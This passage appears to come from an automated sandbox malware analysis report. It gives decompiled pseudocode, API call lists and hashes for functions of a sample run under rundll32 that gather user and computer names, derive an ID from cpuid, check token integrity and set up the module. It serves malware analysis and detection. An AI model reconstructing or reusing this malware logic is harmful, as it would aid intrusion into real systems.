								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2;
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
			}













                                          0x04c01a4e
                                          0x04c01a56
                                          0x04c01a5a
                                          0x04c01a60
                                          0x04c01a65
                                          0x04c01a6a
                                          0x04c01a6d
                                          0x04c01a70
                                          0x04c01a75
                                          0x04c01a76
                                          0x04c01a79
                                          0x04c01a7e
                                          0x04c01a85
                                          0x04c01a8f
                                          0x04c01a91
                                          0x04c01a92
                                          0x04c01a95
                                          0x04c01ab1
                                          0x04c01ab7
                                          0x04c01abb
                                          0x04c01b09
                                          0x04c01abd
                                          0x04c01aca
                                          0x04c01ada
                                          0x04c01ae2
                                          0x04c01af4
                                          0x04c01af8
                                          0x00000000
                                          0x00000000
                                          0x04c01ae4
                                          0x04c01ae7
                                          0x04c01aec
                                          0x04c01aee
                                          0x04c01aee
                                          0x04c01acc
                                          0x04c01ace
                                          0x04c01afa
                                          0x04c01afb
                                          0x04c01afb
                                          0x04c01aca
                                          0x04c01b10

                                          APIs
                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,04C04996,?,?,4D283A53,?,?), ref: 04C01A5A
                                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 04C01A70
                                          • _snwprintf.NTDLL ref: 04C01A95
                                          • CreateFileMappingW.KERNELBASE(000000FF,04C0D2A8,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 04C01AB1
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04C04996,?,?,4D283A53,?), ref: 04C01AC3
                                          • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 04C01ADA
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,04C04996,?,?,4D283A53), ref: 04C01AFB
                                          • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,04C04996,?,?,4D283A53,?), ref: 04C01B03
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                          • String ID:
                                          • API String ID: 1814172918-0
                                          • Opcode ID: ad931e930db8035e230d0cdcd563aedb4381da1995371822254e036658011a3b
                                          • Instruction ID: 661242075122de284a6bbc3821feb9a8fa50c4d32ddc832e620b2f93af253b2f
                                          • Opcode Fuzzy Hash: ad931e930db8035e230d0cdcd563aedb4381da1995371822254e036658011a3b
                                          • Instruction Fuzzy Hash: FE21C3B6640204BFD721EBA8CC45F9A77BAEB44705F1A8221F606E71C0EB75EA45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C093D5, Relevance: 12.1, APIs: 8, Instructions: 103memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 139 4c093d5-4c093e9 140 4c093f3-4c09405 call 4c06f89 139->140 141 4c093eb-4c093f0 139->141 144 4c09407-4c09417 GetUserNameW 140->144 145 4c09459-4c09466 140->145 141->140 146 4c09468-4c0947f GetComputerNameW 144->146 147 4c09419-4c09429 RtlAllocateHeap 144->147 145->146 148 4c09481-4c09492 RtlAllocateHeap 146->148 149 4c094bd-4c094e1 146->149 147->146 150 4c0942b-4c09438 GetUserNameW 147->150 148->149 151 4c09494-4c0949d GetComputerNameW 148->151 152 4c09448-4c09457 HeapFree 150->152 153 4c0943a-4c09446 call 4c07cf7 150->153 154 4c094ae-4c094b7 HeapFree 151->154 155 4c0949f-4c094ab call 4c07cf7 151->155 152->146 153->152 154->149 155->154
                                          C-Code - Quality: 96%
                                          			E04C093D5(char __eax, void* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				void* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x4c0d270; // 0xd448b889
					_v12 = _t59;
				}
				_t64 = _t69;
				E04C06F89( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x4c0d2a0 ^ 0x76f6612d;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x4c0d238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t64 = _t62;
								 *_t69 =  *_t69 ^ E04C07CF7(_v8 + _v8, _t64);
							}
							HeapFree( *0x4c0d238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x4c0d238, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t64 = _t68;
							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E04C07CF7(_v8 + _v8, _t64);
						}
						HeapFree( *0x4c0d238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *((intOrPtr*)(_t67 + 8)) = 0;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39;
				return _t39;
			}



















                                          0x04c093d5
                                          0x04c093dd
                                          0x04c093e1
                                          0x04c093e4
                                          0x04c093e9
                                          0x04c093eb
                                          0x04c093f0
                                          0x04c093f0
                                          0x04c093f6
                                          0x04c093f8
                                          0x04c09405
                                          0x04c09466
                                          0x04c09407
                                          0x04c0940c
                                          0x04c09412
                                          0x04c09417
                                          0x04c09425
                                          0x04c09429
                                          0x04c09438
                                          0x04c0943f
                                          0x04c09446
                                          0x04c09446
                                          0x04c09451
                                          0x04c09451
                                          0x04c09429
                                          0x04c09417
                                          0x04c09468
                                          0x04c0946e
                                          0x04c09478
                                          0x04c0947a
                                          0x04c0947f
                                          0x04c0948e
                                          0x04c09492
                                          0x04c0949d
                                          0x04c094a4
                                          0x04c094ab
                                          0x04c094ab
                                          0x04c094b7
                                          0x04c094b7
                                          0x04c09492
                                          0x04c094c2
                                          0x04c094c4
                                          0x04c094c7
                                          0x04c094c9
                                          0x04c094cc
                                          0x04c094cf
                                          0x04c094d9
                                          0x04c094dd
                                          0x04c094e1

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04C0940C
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04C09423
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 04C09430
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C09451
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04C09478
                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04C0948C
                                          • GetComputerNameW.KERNEL32(00000000,00000000), ref: 04C09499
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C094B7
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: HeapName$AllocateComputerFreeUser
                                          • String ID:
                                          • API String ID: 3239747167-0
                                          • Opcode ID: 751e1800eb1c3b2180873ce83c7319467ed712e6d541a1ac38302dd423b7b32a
                                          • Instruction ID: a0caf3d1717360d8f740b74918d152d0cb5d344974bc9e2012fcfd85736714ef
                                          • Opcode Fuzzy Hash: 751e1800eb1c3b2180873ce83c7319467ed712e6d541a1ac38302dd423b7b32a
                                          • Instruction Fuzzy Hash: C03139B5A00209EFEB10DFA9D880BAEB7FAFF44304F528569E505D7291D734EE419B10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C053E3, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E04C053E3(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4c0d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04C058BE(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04C0147E(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                          0x04c053f0
                                          0x04c053f7
                                          0x04c053fe
                                          0x04c05412
                                          0x04c0541d
                                          0x04c05435
                                          0x04c05442
                                          0x04c05445
                                          0x04c0544a
                                          0x04c05455
                                          0x04c05459
                                          0x04c05468
                                          0x04c0546c
                                          0x04c05488
                                          0x04c05488
                                          0x04c0548c
                                          0x04c0548c
                                          0x04c05491
                                          0x04c05495
                                          0x04c0549b
                                          0x04c0549c
                                          0x04c054a3
                                          0x04c054a9

                                          APIs
                                          • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04C05415
                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04C05435
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04C05445
                                          • CloseHandle.KERNEL32(00000000), ref: 04C05495
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04C05468
                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04C05470
                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04C05480
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                          • String ID:
                                          • API String ID: 1295030180-0
                                          • Opcode ID: 92272bdb6cafb47524a5c56f1c1f62246300cc2258039f11336e98f11c7631ab
                                          • Instruction ID: 2fe8c7c79380f6a3dbb8735b1d1d80d42c03ce82c8ff5c480cc2d4e3dd143529
                                          • Opcode Fuzzy Hash: 92272bdb6cafb47524a5c56f1c1f62246300cc2258039f11336e98f11c7631ab
                                          • Instruction Fuzzy Hash: CC212A79900219FFEB10DFE4DC44EEEBB79EB44304F0080A5E511A6291C7759E45EF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C07C75, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 186 4c07c75-4c07c88 187 4c07c8f-4c07c93 StrChrA 186->187 188 4c07c95-4c07ca6 call 4c058be 187->188 189 4c07c8a-4c07c8e 187->189 192 4c07ca8-4c07cb4 StrTrimA 188->192 193 4c07ceb 188->193 189->187 195 4c07cb6-4c07cbf StrChrA 192->195 194 4c07ced-4c07cf4 193->194 196 4c07cd1-4c07cdd 195->196 197 4c07cc1-4c07ccb StrTrimA 195->197 196->195 198 4c07cdf-4c07ce9 196->198 197->196 198->194
                                          C-Code - Quality: 54%
                                          			E04C07C75(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E04C058BE(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x4c0c28c); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x4c0c28c);
						}
						_t2 = _t27 + 0x10; // 0x4d283a53
						 *( *_t2 + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					_t6 = _t27 + 0x10; // 0x4d283a53
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
				}
				return 0;
			}










                                          0x04c07c80
                                          0x04c07c84
                                          0x04c07c86
                                          0x04c07c87
                                          0x04c07c8f
                                          0x04c07c8f
                                          0x04c07c93
                                          0x00000000
                                          0x00000000
                                          0x04c07c8a
                                          0x04c07c8b
                                          0x04c07c8e
                                          0x04c07c8e
                                          0x04c07c9b
                                          0x04c07ca0
                                          0x04c07ca6
                                          0x04c07cae
                                          0x04c07cb4
                                          0x04c07cb6
                                          0x04c07cbb
                                          0x04c07cbf
                                          0x04c07cc1
                                          0x04c07cc4
                                          0x04c07ccb
                                          0x04c07ccb
                                          0x04c07cd1
                                          0x04c07cd5
                                          0x04c07cd8
                                          0x04c07cd9
                                          0x04c07cdb
                                          0x04c07ce3
                                          0x04c07ce7
                                          0x04c07ce7
                                          0x04c07cf4

                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,055895AC,?,?,?,04C04C85,055895AC,?,?,?,04C04A8B,?,?,?), ref: 04C07C8F
                                          • StrTrimA.KERNELBASE(?,04C0C28C,00000002,?,?,?,04C04C85,055895AC,?,?,?,04C04A8B,?,?,?,4D283A53), ref: 04C07CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,04C04C85,055895AC,?,?,?,04C04A8B,?,?,?,4D283A53,?), ref: 04C07CB9
                                          • StrTrimA.SHLWAPI(00000001,04C0C28C,?,?,?,04C04C85,055895AC,?,?,?,04C04A8B,?,?,?,4D283A53,?), ref: 04C07CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 7d71f5f406dc8ef88d306869fdff7a455e343c6a8be948659f4ae7c77b559610
                                          • Instruction ID: c1a9e966b616556bfbc1ea3c1470732c4f58f3a06ff9d4a639d62ed38d5f94ec
                                          • Opcode Fuzzy Hash: 7d71f5f406dc8ef88d306869fdff7a455e343c6a8be948659f4ae7c77b559610
                                          • Instruction Fuzzy Hash: 1701D8757063256FD2259F658C48F3BBF9DEB45A60F128618F942C7280DB60FC0196F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C04908, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 199 4c04908-4c04922 call 4c011af 202 4c04924-4c04932 199->202 203 4c04938-4c04946 199->203 202->203 205 4c04958-4c04973 call 4c01111 203->205 206 4c04948-4c0494b 203->206 212 4c04975-4c0497b 205->212 213 4c0497d 205->213 206->205 208 4c0494d-4c04952 206->208 208->205 209 4c04adb 208->209 211 4c04add-4c04ae2 209->211 214 4c04983-4c04998 call 4c01ec4 call 4c01a4e 212->214 213->214 219 4c049a3-4c049a9 214->219 220 4c0499a-4c0499d CloseHandle 214->220 221 4c049ab-4c049b0 219->221 222 4c049cf-4c049e7 call 4c058be 219->222 220->219 224 4c04ac6-4c04acb 221->224 225 4c049b6 221->225 230 4c04a13-4c04a15 222->230 231 4c049e9-4c04a11 memset RtlInitializeCriticalSection 222->231 227 4c04ad3-4c04ad9 224->227 228 4c04acd-4c04ad1 224->228 229 4c049b9-4c049c8 call 4c07827 225->229 227->211 228->211 228->227 236 4c049ca 229->236 235 4c04a16-4c04a1a 230->235 231->235 235->224 237 4c04a20-4c04a36 RtlAllocateHeap 235->237 236->224 238 4c04a66-4c04a68 237->238 239 4c04a38-4c04a64 wsprintfA 237->239 240 4c04a69-4c04a6d 238->240 239->240 240->224 241 4c04a6f-4c04a8f call 4c093d5 call 4c098f7 240->241 241->224 246 4c04a91-4c04a98 call 4c0205b 241->246 249 4c04a9a-4c04a9d 246->249 250 4c04a9f-4c04aa6 246->250 249->224 251 4c04aa8-4c04aaa 250->251 252 4c04abb-4c04abf call 4c09b6f 250->252 251->224 253 4c04aac-4c04ab0 call 4c06cd3 251->253 256 4c04ac4 252->256 257 4c04ab5-4c04ab9 253->257 256->224 257->224 257->252
                                          C-Code - Quality: 57%
                                          			E04C04908(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				CHAR* _t46;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04C011AF();
				if(_t21 != 0) {
					_t59 =  *0x4c0d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4c0d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4c0d164(0, 2);
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04C01111( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4c0d2a4; // 0x97a5a8
					if( *0x4c0d25c > 5) {
						_t8 = _t26 + 0x4c0e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4c0ea05; // 0x44283a44
						_t27 = _t7;
					}
					E04C01EC4(_t27, _t27);
					_t31 = E04C01A4E(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x4c0d270 =  *0x4c0d270 ^ 0x81bbe65d;
						_t32 = E04C058BE(0x60);
						 *0x4c0d324 = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4c0d324; // 0x55895b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4c0d324; // 0x55895b0
							 *_t51 = 0x4c0e845;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4c0d238, 0, 0x43);
							 *0x4c0d2c4 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4c0d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4c0d2a4; // 0x97a5a8
								_t13 = _t58 + 0x4c0e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4c0c28f);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04C093D5( ~_v8 &  *0x4c0d270, 0x4c0d00c); // executed
								_t42 = E04C098F7(0, _t55, _t63, 0x4c0d00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04C0205B(_t55); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04C09B6F(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t46 = E04C06CD3(__eflags,  &(_t67[4])); // executed
									_t54 = _t46;
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4c0d160();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E04C07827(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}
































                                          0x04c04908
                                          0x04c04912
                                          0x04c04915
                                          0x04c04918
                                          0x04c0491b
                                          0x04c04922
                                          0x04c04924
                                          0x04c04930
                                          0x04c04932
                                          0x04c04932
                                          0x04c0493b
                                          0x04c04941
                                          0x04c04946
                                          0x04c04960
                                          0x04c0496c
                                          0x04c0496e
                                          0x04c04973
                                          0x04c0497d
                                          0x04c0497d
                                          0x04c04975
                                          0x04c04975
                                          0x04c04975
                                          0x04c04975
                                          0x04c04984
                                          0x04c04991
                                          0x04c04998
                                          0x04c0499d
                                          0x04c0499d
                                          0x04c049a6
                                          0x04c049a9
                                          0x04c049cf
                                          0x04c049db
                                          0x04c049e0
                                          0x04c049e5
                                          0x04c049e7
                                          0x04c04a13
                                          0x04c04a15
                                          0x04c049e9
                                          0x04c049ed
                                          0x04c049f2
                                          0x04c049f7
                                          0x04c049fe
                                          0x04c04a04
                                          0x04c04a09
                                          0x04c04a0f
                                          0x04c04a16
                                          0x04c04a18
                                          0x04c04a1a
                                          0x04c04a29
                                          0x04c04a2f
                                          0x04c04a34
                                          0x04c04a36
                                          0x04c04a66
                                          0x04c04a68
                                          0x04c04a38
                                          0x04c04a38
                                          0x04c04a3e
                                          0x04c04a4b
                                          0x04c04a51
                                          0x04c04a51
                                          0x04c04a59
                                          0x04c04a62
                                          0x04c04a69
                                          0x04c04a6b
                                          0x04c04a6d
                                          0x04c04a74
                                          0x04c04a81
                                          0x04c04a86
                                          0x04c04a8b
                                          0x04c04a8d
                                          0x04c04a8f
                                          0x00000000
                                          0x00000000
                                          0x04c04a91
                                          0x04c04a96
                                          0x04c04a98
                                          0x04c04a9f
                                          0x04c04aa3
                                          0x04c04aa6
                                          0x04c04abb
                                          0x04c04abf
                                          0x04c04ac4
                                          0x00000000
                                          0x04c04ac4
                                          0x04c04aa8
                                          0x04c04aaa
                                          0x00000000
                                          0x00000000
                                          0x04c04ab0
                                          0x04c04ab5
                                          0x04c04ab7
                                          0x04c04ab9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x04c04ab9
                                          0x04c04a9c
                                          0x04c04a9c
                                          0x04c04a6d
                                          0x04c049ab
                                          0x04c049ab
                                          0x04c049b0
                                          0x04c04ac6
                                          0x04c04acb
                                          0x04c04ad3
                                          0x04c04ad3
                                          0x00000000
                                          0x04c04acb
                                          0x04c049b6
                                          0x04c049b9
                                          0x04c049c3
                                          0x04c049ca
                                          0x00000000
                                          0x04c04adb
                                          0x04c04adb
                                          0x04c04ade
                                          0x04c04ae2
                                          0x04c04ae2

                                          APIs
                                            • Part of subcall function 04C011AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,04C04920,00000001), ref: 04C011BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04C0499D
                                            • Part of subcall function 04C058BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04C01C51), ref: 04C058CA
                                          • memset.NTDLL ref: 04C049ED
                                          • RtlInitializeCriticalSection.NTDLL(05589570), ref: 04C049FE
                                            • Part of subcall function 04C06CD3: memset.NTDLL ref: 04C06CED
                                            • Part of subcall function 04C06CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04C06D24
                                            • Part of subcall function 04C06CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04C04AB5), ref: 04C06D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04C04A29
                                          • wsprintfA.USER32 ref: 04C04A59
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.327848318.0000000004C01000.00000020.00020000.sdmp, Offset: 04C00000, based on PE: true
                                          • Associated: 0000000C.00000002.327839283.0000000004C00000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327886929.0000000004C0C000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327914116.0000000004C0D000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000C.00000002.327936528.0000000004C0F000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_4c00000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: c4c3a024650caea430f97dd23cc32e03e1717d5aa434593f8543f5413598816a
                                          • Instruction ID: 5fb0d1ed57e8e8c3b31d363d7a62efd8ded13efa27b6fb0f9b8c86d3ac796846
                                          • Opcode Fuzzy Hash: c4c3a024650caea430f97dd23cc32e03e1717d5aa434593f8543f5413598816a
                                          • Instruction Fuzzy Hash: 9251B475A00215AFEB29EBE4D844B6F77AEEB04B04F058535E702D71C0E678FE409B58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04C06CD3, Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 157stringCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E04C06CD3(void* __eflags, WCHAR* _a4) {
				char _v40;
				char _v44;
				void _v48;
				int _v52;
				char _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr _v72;
				int _v76;
				WCHAR* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* __ebx;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				char _t50;
				intOrPtr _t52;
				void* _t55;
				intOrPtr _t67;
				void* _t70;
				void* _t81;
				WCHAR* _t90;

				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_v76 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x4c0d2a4; // 0x97a5a8
				_t5 = _t40 + 0x4c0ee24; // 0x410025
				_t90 = E04C04814(_t5);
				_v84 = _t90;
				if(_t90 == 0) {
					_t81 = 8;
					L24:
					return _t81;
				}
				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
				if(_t45 != 0) {
					_t81 = 1;
					L22:
					E04C0147E(_v88);
					goto L24;
				}
				if(E04C09138(0,  &_v96) != 0) {
					_v96 = 0;
				}
				_t50 = E04C0A5E9(0,  *0x4c0d33c);
				_v96 = _t50;
				if(_t50 == 0) {
					_t81 = 8;
					goto L19;
				} else {
					_t52 =  *0x4c0d2a4; // 0x97a5a8
					_t11 = _t52 + 0x4c0e81a; // 0x65696c43
					_t55 = E04C0A5E9(0, _t11);
					_t93 = _t55;
					if(_t55 == 0) {
						_t81 = 8;
					} else {
